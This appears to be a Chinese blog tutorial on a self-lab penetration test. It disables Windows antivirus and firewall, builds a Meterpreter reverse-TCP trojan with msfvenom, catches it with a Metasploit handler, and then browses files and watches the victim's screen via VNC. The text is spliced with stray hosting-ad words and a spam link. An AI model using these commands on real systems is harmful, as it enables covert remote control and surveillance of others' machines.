本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕
声明:本篇仅仅是将本机作为靶机的一次简易渗透测试,实际情况中基本不可能出现如此简单的木马骇入(往往在上传木马时就被防护功能进行查杀了),况且——任何骇入他人设备的操作都是违法行为,因此仅用作经验分享供学习。
一,确认相关设置
①VMware菜单栏中选择【虚拟机(M)】->【设置(S)】->在网络适配器中确认开启NAT服务器托管网模式
②控制面板中选择【查看网络状态和任务】->【更改设配器设置】
->找到VMnet8网卡,右键【属性】->在属性栏中找到【VMware Bridge Protocol】打开桥接模式,使主机和虚拟机能够互连
③按如下步骤关闭【病毒和威胁防护】与【防火墙和网络保护】,这一步是为了保证待会儿我们上传给本机(靶机)的“小木马”不会被这些强力防护阻拦与清除
进行此步操作请确保本机没有被入侵的风险,笔者写本篇的目的仅为提供经验,
如若出现任何损失,概不负责!
二,创建木马与上传木马
①打开kali虚拟机,打开终端,输入命令【ifconfig】(注意是if不是ip!)查看虚拟机(攻击机)的ip地址
②输入以下命令,生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe
注————
蓝色部分是上一步查看到的虚拟机(攻击机)的ip地址,请自行查询并修改;
紫色部分是用于监听本机(靶机)的端口,任意选择一个不被占用的端口即可;
绿色部分是本次生成的木马文件的名字,任意设置;
(代码块用于快速复制命令:)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xx.xxx LPORT=9999 -f exe > test.exe
出现如下回显说明成功,且在执行命令的工作目录下生成文件,这里我是在桌面目录即【~/Desktop】执行的命令,因此文件直接生成在了桌面上,读者可自行选择目录执行命令
③上传木马到本机(靶机)上,直接采用最直接的拖动法完成上传…
进行这一步时请确保标题一中相关设置的第③步,否则木马文件会被阻拦或清除!
三,执行命令以监听本机(靶机)
①在kali终端中依次输入以下命令:
msfconsole
use exploit/multi/handler
windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xxx
set lport 9999
exploit
注————
蓝色部分是虚拟机(攻击机)的ip地址,请自行查询并修改;
紫色部分是用于监听本机(靶机)的端口,需要确保和标题二中创建木马时输入的端口相同
(代码块用于快速复制命令:)
msfconsole
use exploit/multi/handler
windows/meterpreter/reverse_tcp
set lhost 192.168.xx.xxx
set lport 9999
exploit
②本机(靶机)运行木马文件“上钩”
在上一步中,执行完命令【exploit】后kali将进入连接状态,kali终端显示如下:
此时在本机中运行木马文件即可,运行服务器托管网后kali将成功完成渗透,并进入【meterpreter】状态
四,测试
①基础浏览
渗透成功后,虚拟机(攻击机)可以实时监控本机(靶机),可以使用Linux基本命令如:【ls】列出本机(靶机)当前目录的文件和文件夹,【cat】命令查看本机(靶机)的文件具体内容…等等,请读者自行摸索测试,可以使用命令【help】获取命令菜单
②实时监控
使用命令【run vnc】将在虚拟机(攻击机)中生成窗口,实时监控本机(靶机)
③退出连接
使用快捷键【Ctrl + Z】将退出对当前靶机的连接,询问是否退出,输入【y】,如下:
④查看已连接设备(即“上钩”靶机)
退出连接状态后,使用命令【sessions】可以列出所有“上钩”靶机,使用命令【sessions -i Id】可以连接指定id的靶机,如”sessions -i 1″将连接Id为1的靶机
尾声
完成测试后记得及时开启【病毒和威胁防护】与【防火墙和网络保护】,防止本机受到病毒或骇客攻击,具体操作见【标题一的第③步】
本篇技术仅用作经验分享,请勿用于任何非法行为!
任何入侵他人设备的操作都是违法行为!
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net